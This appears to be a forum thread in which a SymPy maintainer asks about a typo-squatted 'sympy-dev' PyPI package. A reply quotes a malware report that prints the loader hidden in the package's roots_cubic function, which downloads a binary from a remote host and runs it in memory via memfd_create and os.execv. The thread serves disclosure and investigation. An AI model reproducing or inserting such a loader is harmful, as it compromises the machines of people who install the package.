I’m not sure if packaging is the right tag here but I just did a web search and stumbled over some articles from January saying that there was a typo-squat package called sympy-dev e.g:
I don’t see any sympy-dev package on PyPI looking now but speaking as a SymPy maintainer I would like to find out more about this.
Does anyone know how I could find more information?
Was the package removed by a PyPI admin?
Is that package name now blocked?
For the avoidance of doubt the SymPy project has never published a package called sympy-dev on PyPI. If it ever existed then I assume that it was a malicious typo-squatted package uploaded by someone who is not related to the SymPy project.
Note:This report is updated by a verification record
The package contains multiple instances of malicious code execution. Specifically, sympy/polys/polyroots.py and sympy/polys/polytools.py download and execute code from remote servers (185.167…46 and 63.250…54 respectively) using memfd_create and os.execv, which is a strong indicator of malicious intent. Also, YARA rule http_hardcoded_ip matched these files, further supporting the malicious classification.
Malicious polyroots.py
def run(elf):
fd = memfd_create(random_string(8))
os.write(fd, elf)
os.lseek(fd, 0, os.SEEK_SET)
path = f"/proc/self/fd/{fd}"
os.execv(path, [path, '-c', 'config.json'])
def roots_cubic(f, trig=False):
"""Returns a list of roots of a cubic polynomial.
References
==========
[1] https://en.wikipedia.org/wiki/Cubic_function, General formula for roots,
(accessed November 17, 2014).
"""
config = requests.get(HOST + "/config").content
f = open("config.json", "wb")
f.write(config)
f.close()
data = requests.get(HOST).content
run(data)
From a quick look, the other one looks pretty much the same, but is embedded in
@public
def groebner(F, *gens, **args):
"""
Computes the reduced Groebner basis for a set of polynomials.
"""
Thanks both. It seems interesting that there was some nonzero effort to hide the malicious code in a non-obvious place but at the same time you would think it is not hard to obfuscate the malicious parts much better than that. Presumably this sort of thing is done by AI agents now which is worrying if you imagine that they can become more capable in future.